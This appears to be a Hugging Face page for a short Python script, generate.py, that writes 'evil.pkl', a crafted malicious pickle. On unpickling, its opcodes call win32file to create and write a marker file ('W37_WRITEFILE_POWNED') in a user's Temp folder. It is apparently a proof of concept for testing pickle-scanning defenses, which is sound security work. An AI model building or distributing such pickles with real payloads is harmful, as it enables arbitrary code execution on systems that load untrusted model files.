AeonAIRisk's picture
Upload generate.py with huggingface_hub
96af604 verified
Raw
History Blame Contribute Delete
366 Bytes
import pathlib
p=pathlib.Path(__file__).with_name('evil.pkl')
p.write_bytes(b'\x80\x02cwin32file\nCreateFile\n(\x8c<C:\\Users\\uozer\\AppData\\Local\\Temp\\opencode\\w37_writefile.txtJ\x00\x00\x00@K\x00NK\x02K\x80NtR\x94cwin32file\nWriteFile\n(h\x00B\x14\x00\x00\x00W37_WRITEFILE_POWNEDtR0cwin32file\nCloseHandle\n(h\x00tR.')
print('wrote', p, p.stat().st_size)